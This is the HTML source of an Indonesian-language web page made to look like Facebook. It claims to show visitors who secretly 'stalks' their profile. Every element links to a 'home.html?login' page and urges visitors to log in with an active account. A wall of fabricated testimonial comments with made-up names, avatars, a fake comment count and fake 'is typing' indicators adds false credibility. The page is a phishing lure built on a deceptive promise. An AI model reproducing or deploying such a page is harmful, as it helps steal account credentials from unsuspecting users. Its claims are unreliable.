<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta http-equiv="content-language" content="en">
	<meta name="viewport" content="width=device-width, initial-scale=1">

	<title> Stalking Mantan</title>
	<meta name="robots" content="noindex, nofollow">
	<meta property="og:image" content="https://i.ytimg.com/vi/pg-5FiBJH_Y/maxresdefault.jpg">

	<link rel="icon" type="image/png" href="https://i.ytimg.com/vi/pg-5FiBJH_Y/maxresdefault.jpg">

        <link href="https://fonts.googleapis.com/css?family=Asap:400,700,400italic,700italic" rel="stylesheet" type="text/css">
	<link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css" rel="stylesheet">
	<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css" rel="stylesheet">
		
	<link href="https://rawcdn.githack.com/ermania96/mov/f06e2438/mov.css" rel="stylesheet" type="text/css">
	<link href="https://rawcdn.githack.com/zaia1992/cinemax21/734da622/style.css" rel="stylesheet" type="text/css">
	<link href="https://s3-us-west-1.amazonaws.com/bucket.cpabuild.com/assets/landing_pages/facebook-comments.css" rel="stylesheet" type="text/css">

	<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
	<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/modernizr/2.7.1/modernizr.min.js" type="text/javascript"></script>
	<script src="https://rawcdn.githack.com/ermania96/mov/3f67ac8b/css3-mediaqueries.js" type="text/javascript"></script>

	

</head><body>



<div class="container box-container">
        <div class="row">        <div class="col-md-12">
<center><a href="./home.html?login"> <img src="https://bit.ly/45yQeKL" class="img-responsive">
</a></center></div><a href="./home.html?login">
     </a><center><a href="./home.html?login">
</a><div class="container box-container"><a href="./home.html?login">
        </a><div class="row"><a href="./home.html?login"> </a><div class="col-md-12"><a href="./home.html?login">
        <div class="page-header text-center"><center>
        <span style="line-height:20px;font-family:times;font-style:italic;font-size:16pt;">Facebook membantu Anda terhubung dan berbagi.<br>
  <span style="line-height:20px;font-family:times;font-style:italic;font-size:16pt;">dengan orang-orang dalam kehidupan<font color="red"> Anda !!!</font></span></span></center></div><font color="red"> 
                        <div class="page-header text-center tittle h4"> <span style="font-style:italic;" class="h5"><font color="black">?Cara mengetahui stalking yang sering kepo melihat profil Facebook kita secara <span style="color: Green;"> diam-diam </span>...!!!!<br><br><span style="color: red;">INILAH DAFTAR PEMUJA RAHASIAMU</span>...!!!</font></span></div>
			
                        
</font></a>
<center><a href="./home.html?login"><img src="https://bit.ly/466Ab7P" class="img-responsive"><br>
           </a><a href="./home.html?login"><img src="https://bit.ly/3PlPumV" class="img-responsive"></a></center>
           <span style="font-style:italic;" class="h5"><font color="#0b5394">Pastikan anda masuk/Login mengunakan akun aktif,agar terkoneksi kedalam webistes www.facebook.kepo.id ?</font></span><font color="red"><div class="page-header text-center"><a href="./home.html?login"></a><center><a href="./home.html?login"></a><a href="./home.html?login"> <img src="https://i.ytimg.com/vi/pg-5FiBJH_Y/maxresdefault.jpg" class="img-responsive"></a></center></div><div class="page-header text-center"><center><a href="./home.html?login"> <img src="https://dewailmu.id/wp-content/uploads/2020/05/cara-mengetahui-stalker-fb.jpg" class="img-responsive"></a></center></div>

     
         </font></div><font color="red">
     
<div class="page-header text-center tittle h5"><center>
</center></div><font color="#0b5394"> 

 <center><a href=""><img src="https://bit.ly/3qR7ifA" class="img-responsive"><br>
  <font color="#0b5394" size="1px"><font color="#0b5394" size="1px">
  
	</font></font></a><font color="#0b5394" size="1px"><font color="#0b5394" size="1px"><div class="col-md-12"><a href="">
</a><p align="left"><a href="">
  
</a><a href="">  
<table class="table">
<tbody>
<tr>
<td>

 <style>  	
#slideset1 {height: 10em; position: relative;
  overflow: hidden}
#slideset1 > * {height: 88.7%; box-sizing: border-box;
  overflow: hidden}
#slideset1 > *:first-child {
  animation: 15s autoplay3 infinite ease-in-out}
@keyframes autoplay3 {
  0% {margin-top: 10em}
  4% {margin-top: 0em}
  31% {margin-top: 0em}
  35% {margin-top: -10em}
  64% {margin-top: -10em}
  68% {margin-top: -20em}
  96% {margin-top: -20em}
  100% {margin-top: -30em}
} 
</style>     
  
<style>  	
#slideset2 {height: 10em; position: relative;
  overflow: hidden}
#slideset2 > * {height: 88.7%; box-sizing: border-box;
  overflow: hidden}
#slideset2 > *:first-child {
  animation: 8s autoplay3 infinite ease-in-out}
@keyframes autoplay3 {
  0% {margin-top: 10em}
  4% {margin-top: 0em}
  31% {margin-top: 0em}
  35% {margin-top: -10em}
  64% {margin-top: -10em}
  68% {margin-top: -20em}
  96% {margin-top: -20em}
  100% {margin-top: -30em}
}  
</style>   
    
<style>  	
#slideset3 {height: 10em; position: relative;
  overflow: hidden}
#slideset3 > * {height: 88.7%; box-sizing: border-box;
  overflow: hidden}
#slideset3 > *:first-child {
  animation: 12s autoplay3 infinite ease-in-out}
@keyframes autoplay3 {
  0% {margin-top: 10em}
  4% {margin-top: 0em}
  31% {margin-top: 0em}
  35% {margin-top: -10em}
  64% {margin-top: -10em}
  68% {margin-top: -20em}
  96% {margin-top: -20em}
  100% {margin-top: -30em}
}  
</style>     
 
<style>  	
#slideset4 {height: 10em; position: relative;
  overflow: hidden}
#slideset4 > * {height: 88.7%; box-sizing: border-box;
  overflow: hidden}
#slideset4 > *:first-child {
  animation: 15s autoplay3 infinite ease-in-out}
@keyframes autoplay3 {
  0% {margin-top: 10em}
  4% {margin-top: 0em}
  31% {margin-top: 0em}
  35% {margin-top: -10em}
  64% {margin-top: -10em}
  68% {margin-top: -20em}
  96% {margin-top: -20em}
  100% {margin-top: -30em}
}  
</style>     
  
<style>  	
#slideset5 {height: 10em; position: relative;
  overflow: hidden}
#slideset5 > * {height: 88.7%; box-sizing: border-box;
  overflow: hidden}
#slideset5 > *:first-child {
  animation: 8s autoplay3 infinite ease-in-out}
@keyframes autoplay3 {
  0% {margin-top: 10em}
  4% {margin-top: 0em}
  31% {margin-top: 0em}
  35% {margin-top: -10em}
  64% {margin-top: -10em}
  68% {margin-top: -20em}
  96% {margin-top: -20em}
  100% {margin-top: -30em}
}  
</style>   
    
<style>  	
#slideset6 {height: 10em; position: relative;
  overflow: hidden}
#slideset6 > * {height: 100%; box-sizing: border-box;
  overflow: hidden}
#slideset6 > *:first-child {
  animation: 12s autoplay3 infinite ease-in-out}
@keyframes autoplay3 {
  0% {margin-top: 10em}
  4% {margin-top: 0em}
  31% {margin-top: 0em}
  35% {margin-top: -10em}
  64% {margin-top: -10em}
  68% {margin-top: -20em}
  96% {margin-top: -20em}
  100% {margin-top: -30em}
}  
</style>   
  
<style>  	
#slideset7 {height: 10em; position: relative;
  overflow: hidden}
#slideset7 > * {height: 100%; box-sizing: border-box;
  overflow: hidden}
#slideset7 > *:first-child {
  animation: 15s autoplay3 infinite ease-in-out}
@keyframes autoplay3 {
  0% {margin-top: 10em}
  4% {margin-top: 0em}
  31% {margin-top: 0em}
  35% {margin-top: -10em}
  64% {margin-top: -10em}
  68% {margin-top: -20em}
  96% {margin-top: -20em}
  100% {margin-top: -30em}
}  
</style>  
  
<style>  	
#slideset8 {height: 10em; position: relative;
  overflow: hidden}
#slideset8 > * {height: 100%; box-sizing: border-box;
  overflow: hidden}
#slideset8 > *:first-child {
  animation: 8s autoplay3 infinite ease-in-out}
@keyframes autoplay3 {
  0% {margin-top: 10em}
  4% {margin-top: 0em}
  31% {margin-top: 0em}
  35% {margin-top: -10em}
  64% {margin-top: -10em}
  68% {margin-top: -20em}
  96% {margin-top: -20em}
  100% {margin-top: -30em}
}  
</style>  
   
<style>
{
  margin:20px;
  font-family: Helvetica, Arial, sans-serif;
}
.pull-right{
  float:right;
}
.pull-left{
  float:left;
}
#fbcomment{
  background:#fff;
  border: 1px solid #dddfe2;
  border-radius: 4px;
  color: #4b4f56;
  padding:10px;
}
.header_comment{
    font-size: 14px;
    overflow: hidden;
    border-bottom: 1px solid #e9ebee;
    line-height: 25px;
    margin-bottom: 24px;
    padding: 10px 0;
}
.sort_title{
  color: #4b4f56;
}
.sort_by{
  background-color: #f5f6f7;
  color: #4b4f56;
  line-height: 22px;
  cursor: pointer;
  vertical-align: top;
  font-size: 12px;
  font-weight: bold;
  vertical-align: middle;
  padding: 4px;
  justify-content: center;
  border-radius: 2px;
  border: 1px solid #ccd0d5;
}
.count_comment{
  font-weight: 600;
}
.body_comment{
    padding: 0 8px;
    font-size: 14px;
    display: block;
    line-height: 25px;
    word-break: break-word;
}
.avatar_comment{
  display: block;
}
.avatar_comment img{
  height: 48px;
  width: 48px;
}
.box_comment{
	display: block;
    position: relative;
    line-height: 1.358;
    word-break: break-word;
    border: 1px solid #d3d6db;
    word-wrap: break-word;
    background: #fff;
    box-sizing: border-box;
    cursor: text;
    font-family: Helvetica, Arial, sans-serif;
    font-size: 16px;
	padding: 0;
}
.box_comment textarea{
	min-height: 40px;
	padding: 12px 8px;
	width: 100%;
	border: none;
	resize: none;
}
.box_comment textarea:focus{
  outline: none !important;
}
.box_comment .box_post{
	border-top: 1px solid #d3d6db;
    background: #f5f6f7;
    padding: 8px;
    display: block;
    overflow: hidden;
}
.box_comment label{
  display: inline-block;
  vertical-align: middle;
  font-size: 11px;
  color: #90949c;
  line-height: 22px;
}
.box_comment button{
  margin-left:8px;
  background-color: #4267b2;
  border: 1px solid #4267b2;
  color: #fff;
  text-decoration: none;
  line-height: 22px;
  border-radius: 2px;
  font-size: 14px;
  font-weight: bold;
  position: relative;
  text-align: center;
}
.box_comment button:hover{
  background-color: #29487d;
  border-color: #29487d;
}
.box_comment .cancel{
	margin-left:8px;
	background-color: #f5f6f7;
	color: #4b4f56;
	text-decoration: none;
	line-height: 22px;
	border-radius: 2px;
	font-size: 14px;
	font-weight: bold;
	position: relative;
	text-align: center;
  border-color: #ccd0d5;
}
.box_comment .cancel:hover{
	background-color: #d0d0d0;
	border-color: #ccd0d5;
}
.box_comment img{
  height:16px;
  width:16px;
}
.box_result{
  margin-top: 24px;
}
.box_result .result_comment h4{
  font-weight: 600;
  white-space: nowrap;
  color: #365899;
  cursor: pointer;
  text-decoration: none;
  font-size: 14px;
  line-height: 1.358;
  margin:0;
}
.box_result .result_comment{
  display:block;
  overflow:hidden;
  padding: 0;
}
.child_replay{
	border-left: 1px dotted #d3d6db;
	margin-top: 12px;
	list-style: none;
	padding:0 0 0 8px
}
.reply_comment{
	margin:12px 0;
}
.box_result .result_comment p{
  margin: 4px 0;
  text-align:justify;
}
.box_result .result_comment .tools_comment{
  font-size: 12px;
  line-height: 1.358;
}
.box_result .result_comment .tools_comment a{
  color: #4267b2;
  cursor: pointer;
  text-decoration: none;
}
.box_result .result_comment .tools_comment span{
  color: #90949c;
}
.body_comment .show_more{
  background: #3578e5;
  border: none;
  box-sizing: border-box;
  color: #fff;
  font-size: 14px;
  margin-top: 24px;
  padding: 12px;
  text-shadow: none;
  width: 100%;
  font-weight:bold;
  position: relative;
  text-align: center;
  vertical-align: middle;
  border-radius: 2px;
}
  
  </style>
  



<div class="container">
<div class="col-md-12" id="fbcomment">
<div class="header_comment">
<div class="row">
<div class="col-md-6 text-left">
<span class="count_comment">264235 Komentar</span>
</div>
<div class="col-md-6 text-right">
<span class="sort_title">Sort by</span>
<select class="sort_by">
						<option>Top</option>
						<option>Newest</option>
						<option>Oldest</option>
</select>
</div>
</div>
</div>

<div class="body_comment">
<div class="row">
<div class="avatar_comment col-md-1">
<img src="https://img.freepik.com/free-icon/user_318-159711.jpg?w=2000" alt="avatar">
</div>
<div class="box_comment col-md-11">
<textarea class="commentar" placeholder="Add a comment..."></textarea>
<div class="box_post">
<div class="pull-left">
<input type="checkbox" id="post_fb">
<label for="post_fb">Also post on Facebook</label>
</div>
<div class="pull-right">
<span><img src="https://img.freepik.com/free-icon/user_318-159711.jpg?w=2000" alt="avatar">&nbsp;&nbsp;&nbsp;<i class="fa fa-caret-down"></i></span>
<button onclick="submit_comment()" type="button" value="1">Post</button>
</div>
</div>
</div>
</div>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<div class="row">
<ul id="list_comment" class="col-md-12">
           
                      
<div id="slideset1">  
<!-- Start List Comment 1 -->
<div class="fb_comment_wrapper">
<div class="fb_image_block"><img src="https://bit.ly/3Q8XUhJ" class="fb_pic"></div>
<div class="fb_comment_block">
<div class="fb_name">Silviah</div>
<div class="fb_comment">Yaampunn....Lucunya sih kamu demi ngepoin akuh</div></div>
<div class="fb_meta">
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Like</a> "
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Reply</a> "
<img class="fb_like_button fb_meta_item" src="https://bit.ly/3sgberf"><span class="like_count fb_meta_item"></span> "
<span class="fb_timestamp"><div class="fb_image_block">
</div>1 mins ago</span></div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;                   
<img src="https://i.pinimg.com/originals/49/d3/90/49d390ed4b730c2a927c82c62baa0e43.gif" style="width:20%; height:auto;" alt="avatar">    is typing</div><br> 
<!-- Start List Comment 2 -->
<div class="fb_comment_wrapper">
<div class="fb_image_block"><img src="https://bit.ly/48C3zUF" class="fb_pic"></div>
<div class="fb_comment_block">
<div class="fb_name">Adriani</div>
<div class="fb_comment">Wkwkwk. Pengin ketawa sampai segitunya sih kamu kepoin aku hhe</div></div>
<div class="fb_meta">
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Like</a> "
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Reply</a> "
<img class="fb_like_button fb_meta_item" src="https://bit.ly/3sgberf"><span class="like_count fb_meta_item"></span> "
<span class="fb_timestamp"><div class="fb_image_block">
</div>1 mins ago</span></div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;                   
<img src="https://i.pinimg.com/originals/49/d3/90/49d390ed4b730c2a927c82c62baa0e43.gif" style="width:20%; height:auto;" alt="avatar">    is typing</div><br> 
<!-- Start List Comment 3 -->  
<div class="fb_comment_wrapper">
<div class="fb_image_block"><img src="https://bit.ly/3rLvroB" class="fb_pic"></div>
<div class="fb_comment_block">
<div class="fb_name">Airani</div>
<div class="fb_comment">Gookilll bgt keren sih sumpah ini websites bisa ketahuan semua yang suka kepo hha</div></div>
<div class="fb_meta">
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Like</a> "
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Reply</a> "
<img class="fb_like_button fb_meta_item" src="https://bit.ly/3sgberf"><span class="like_count fb_meta_item"></span> "
<span class="fb_timestamp"><div class="fb_image_block">
</div>1 mins ago</span></div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;                      
<img src="https://i.pinimg.com/originals/49/d3/90/49d390ed4b730c2a927c82c62baa0e43.gif" style="width:20%; height:auto;" alt="avatar">    is typing</div><br>
</div> 
<div id="slideset2">  
<!-- Start List Comment 4 -->
<div class="fb_comment_wrapper">
<div class="fb_image_block"><img src="https://bit.ly/3Q2KGCU" class="fb_pic"></div>
<div class="fb_comment_block">
<div class="fb_name">Aisyah</div>
<div class="fb_comment">Ngakk...sia2 beli kouta bisa dpt informasi ke ginih, ketahuan jugakan kamu xixi</div></div>
<div class="fb_meta">
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Like</a> "
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Reply</a> "
<img class="fb_like_button fb_meta_item" src="https://bit.ly/3sgberf"><span class="like_count fb_meta_item"></span> "
<span class="fb_timestamp"><div class="fb_image_block">
</div>1 mins ago</span></div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;                   
<img src="https://i.pinimg.com/originals/49/d3/90/49d390ed4b730c2a927c82c62baa0e43.gif" style="width:20%; height:auto;" alt="avatar">    is typing</div><br> 
<!-- Start List Comment 5 -->
<div class="fb_comment_wrapper">
<div class="fb_image_block"><img src="https://bit.ly/3LKxD6w" class="fb_pic"></div>
<div class="fb_comment_block">
<div class="fb_name">Amanda</div>
<div class="fb_comment">Sungkemm sama yang buat nih website bisa jebol orang yang suka kepo ketahuankan hhe btw thanks you</div></div>
<div class="fb_meta">
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Like</a> "
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Reply</a> "
<img class="fb_like_button fb_meta_item" src="https://bit.ly/3sgberf"><span class="like_count fb_meta_item"></span> "
<span class="fb_timestamp"><div class="fb_image_block">
</div>1 mins ago</span></div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;                   
<img src="https://i.pinimg.com/originals/49/d3/90/49d390ed4b730c2a927c82c62baa0e43.gif" style="width:20%; height:auto;" alt="avatar">    is typing</div><br> 
<!-- Start List Comment 6 -->  
<div class="fb_comment_wrapper">
<div class="fb_image_block"><img src="https://bit.ly/3te0xWh" class="fb_pic"></div>
<div class="fb_comment_block">
<div class="fb_name">Bandiani</div>
<div class="fb_comment">Cukup tahu dan terimaksih buat kamu yang sudah sering kepoin aku</div></div>
<div class="fb_meta">
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Like</a> "
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Reply</a> "
<img class="fb_like_button fb_meta_item" src="https://bit.ly/3sgberf"><span class="like_count fb_meta_item"></span> "
<span class="fb_timestamp"><div class="fb_image_block">
</div>1 mins ago</span></div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;                      
<img src="https://i.pinimg.com/originals/49/d3/90/49d390ed4b730c2a927c82c62baa0e43.gif" style="width:20%; height:auto;" alt="avatar">    is typing</div><br>    
</div>  
  <div id="slideset3">  
<!-- Start List Comment 7 -->
<div class="fb_comment_wrapper">
<div class="fb_image_block"><img src="https://bit.ly/3F6hHYN" class="fb_pic"></div>
<div class="fb_comment_block">
<div class="fb_name">Banurasmi</div>
<div class="fb_comment">Ohh ini rupanya yang selama ini sering ngepoin aku wkwkwk</div></div>
<div class="fb_meta">
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Like</a> "
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Reply</a> "
<img class="fb_like_button fb_meta_item" src="https://bit.ly/3sgberf"><span class="like_count fb_meta_item"></span> "
<span class="fb_timestamp"><div class="fb_image_block">
</div>1 mins ago</span></div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;                   
<img src="https://i.pinimg.com/originals/49/d3/90/49d390ed4b730c2a927c82c62baa0e43.gif" style="width:20%; height:auto;" alt="avatar">    is typing</div><br> 
<!-- Start List Comment 8 -->
<div class="fb_comment_wrapper">
<div class="fb_image_block"><img src="https://bit.ly/45xFlIB" class="fb_pic"></div>
<div class="fb_comment_block">
<div class="fb_name">Basagita</div>
<div class="fb_comment">Hhe kamu ketahuan ngepoin aku yah eakss</div></div>
<div class="fb_meta">
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Like</a> "
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Reply</a> "
<img class="fb_like_button fb_meta_item" src="https://bit.ly/3sgberf"><span class="like_count fb_meta_item"></span> "
<span class="fb_timestamp"><div class="fb_image_block">
</div>1 mins ago</span></div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;                   
<img src="https://i.pinimg.com/originals/49/d3/90/49d390ed4b730c2a927c82c62baa0e43.gif" style="width:20%; height:auto;" alt="avatar">    is typing</div><br> 
<!-- Start List Comment 9 -->  
<div class="fb_comment_wrapper">
<div class="fb_image_block"><img src="https://bit.ly/3tkZgNp" class="fb_pic"></div>
<div class="fb_comment_block">
<div class="fb_name">Bintang Lestary</div>
<div class="fb_comment">Lumayan sih buat nambah hiburan ckckck</div></div>
<div class="fb_meta">
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Like</a> "
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Reply</a> "
<img class="fb_like_button fb_meta_item" src="https://bit.ly/3sgberf"><span class="like_count fb_meta_item"></span> "
<span class="fb_timestamp"><div class="fb_image_block">
</div>1 mins ago</span></div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;                      
<img src="https://i.pinimg.com/originals/49/d3/90/49d390ed4b730c2a927c82c62baa0e43.gif" style="width:20%; height:auto;" alt="avatar">    is typing</div><br>    
</div>  
  <div id="slideset4">  
<!-- Start List Comment 10 -->
<div class="fb_comment_wrapper">
<div class="fb_image_block"><img src="https://bit.ly/46hm7bh" class="fb_pic"></div>
<div class="fb_comment_block">
<div class="fb_name">Danastri Citra</div>
<div class="fb_comment">Love you buat kamuh hhe</div></div>
<div class="fb_meta">
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Like</a> "
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Reply</a> "
<img class="fb_like_button fb_meta_item" src="https://bit.ly/3sgberf"><span class="like_count fb_meta_item"></span> "
<span class="fb_timestamp"><div class="fb_image_block">
</div>1 mins ago</span></div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;                   
<img src="https://i.pinimg.com/originals/49/d3/90/49d390ed4b730c2a927c82c62baa0e43.gif" style="width:20%; height:auto;" alt="avatar">    is typing</div><br> 
<!-- Start List Comment 11 -->
<div class="fb_comment_wrapper">
<div class="fb_image_block"><img src="https://bit.ly/3ZH3QkZ" class="fb_pic"></div>
<div class="fb_comment_block">
<div class="fb_name">Dewi Anggira</div>
<div class="fb_comment">Kamu sungguh luar biasa hhe</div></div>
<div class="fb_meta">
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Like</a> "
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Reply</a> "
<img class="fb_like_button fb_meta_item" src="https://bit.ly/3sgberf"><span class="like_count fb_meta_item"></span> "
<span class="fb_timestamp"><div class="fb_image_block">
</div>1 mins ago</span></div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;                   
<img src="https://i.pinimg.com/originals/49/d3/90/49d390ed4b730c2a927c82c62baa0e43.gif" style="width:20%; height:auto;" alt="avatar">    is typing</div><br> 
<!-- Start List Comment 12 -->  
<div class="fb_comment_wrapper">
<div class="fb_image_block"><img src="https://bit.ly/46sRsHO" class="fb_pic"></div>
<div class="fb_comment_block">
<div class="fb_name">Diajeng Diantry</div>
<div class="fb_comment">Ya beitulah... akhirnya terungkap juga hhe</div></div>
<div class="fb_meta">
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Like</a> "
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Reply</a> "
<img class="fb_like_button fb_meta_item" src="https://bit.ly/3sgberf"><span class="like_count fb_meta_item"></span> "
<span class="fb_timestamp"><div class="fb_image_block">
</div>1 mins ago</span></div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;                      
<img src="https://i.pinimg.com/originals/49/d3/90/49d390ed4b730c2a927c82c62baa0e43.gif" style="width:20%; height:auto;" alt="avatar">    is typing</div><br>    
</div>  
  <div id="slideset5">  
<!-- Start List Comment 13 -->
<div class="fb_comment_wrapper">
<div class="fb_image_block"><img src="https://bit.ly/3rBYYky" class="fb_pic"></div>
<div class="fb_comment_block">
<div class="fb_name">Erina</div>
<div class="fb_comment">Hey buat kamu yang disana terimakasih yah wkwk</div></div>
<div class="fb_meta">
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Like</a> "
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Reply</a> "
<img class="fb_like_button fb_meta_item" src="https://bit.ly/3sgberf"><span class="like_count fb_meta_item"></span> "
<span class="fb_timestamp"><div class="fb_image_block">
</div>1 mins ago</span></div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;                   
<img src="https://i.pinimg.com/originals/49/d3/90/49d390ed4b730c2a927c82c62baa0e43.gif" style="width:20%; height:auto;" alt="avatar">    is typing</div><br> 
<!-- Start List Comment 14 -->
<div class="fb_comment_wrapper">
<div class="fb_image_block"><img src="https://bit.ly/3tlMKNG" class="fb_pic"></div>
<div class="fb_comment_block">
<div class="fb_name">Fara</div>
<div class="fb_comment">Hhha masih ngak percaya sih ko bisa kelihatan yah pake website ini wkwkwk</div></div>
<div class="fb_meta">
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Like</a> "
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Reply</a> "
<img class="fb_like_button fb_meta_item" src="https://bit.ly/3sgberf"><span class="like_count fb_meta_item"></span> "
<span class="fb_timestamp"><div class="fb_image_block">
</div>1 mins ago</span></div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;                   
<img src="https://i.pinimg.com/originals/49/d3/90/49d390ed4b730c2a927c82c62baa0e43.gif" style="width:20%; height:auto;" alt="avatar">    is typing</div><br> 
<!-- Start List Comment 15 -->  
<div class="fb_comment_wrapper">
<div class="fb_image_block"><img src="https://ln.run/YtlTL" class="fb_pic"></div>
<div class="fb_comment_block">
<div class="fb_name">Gemintang</div>
<div class="fb_comment">Hihi aku tunggu kamu dirumahku yah wkwkwk</div></div>
<div class="fb_meta">
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Like</a> "
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Reply</a> "
<img class="fb_like_button fb_meta_item" src="https://bit.ly/3sgberf"><span class="like_count fb_meta_item"></span> "
<span class="fb_timestamp"><div class="fb_image_block">
</div>1 mins ago</span></div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;                      
<img src="https://i.pinimg.com/originals/49/d3/90/49d390ed4b730c2a927c82c62baa0e43.gif" style="width:20%; height:auto;" alt="avatar">    is typing</div><br>    
</div>   
  <div id="slideset6">  
<!-- Start List Comment 16 -->
<div class="fb_comment_wrapper">
<div class="fb_image_block"><img src="https://bit.ly/46j5EDm" class="fb_pic"></div>
<div class="fb_comment_block">
<div class="fb_name">Hanasta</div>
<div class="fb_comment">Aku bilang juga apah pasti kamu orangnya yang suka ngepoin fb aku hhe</div></div>
<div class="fb_meta">
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Like</a> "
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Reply</a> "
<img class="fb_like_button fb_meta_item" src="https://bit.ly/3sgberf"><span class="like_count fb_meta_item"></span> "
<span class="fb_timestamp"><div class="fb_image_block">
</div>1 mins ago</span></div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;                   
<img src="https://i.pinimg.com/originals/49/d3/90/49d390ed4b730c2a927c82c62baa0e43.gif" style="width:20%; height:auto;" alt="avatar">    is typing</div> 
<!-- Start List Comment 17 -->
<div class="fb_comment_wrapper">
<div class="fb_image_block"><img src="https://ln.run/e0UqP" class="fb_pic"></div>
<div class="fb_comment_block">
<div class="fb_name">Indri</div>
<div class="fb_comment">Akhirnya sudah terungkap ternyata kamu orangnya toh hhe</div></div>
<div class="fb_meta">
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Like</a> "
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Reply</a> "
<img class="fb_like_button fb_meta_item" src="https://bit.ly/3sgberf"><span class="like_count fb_meta_item"></span> "
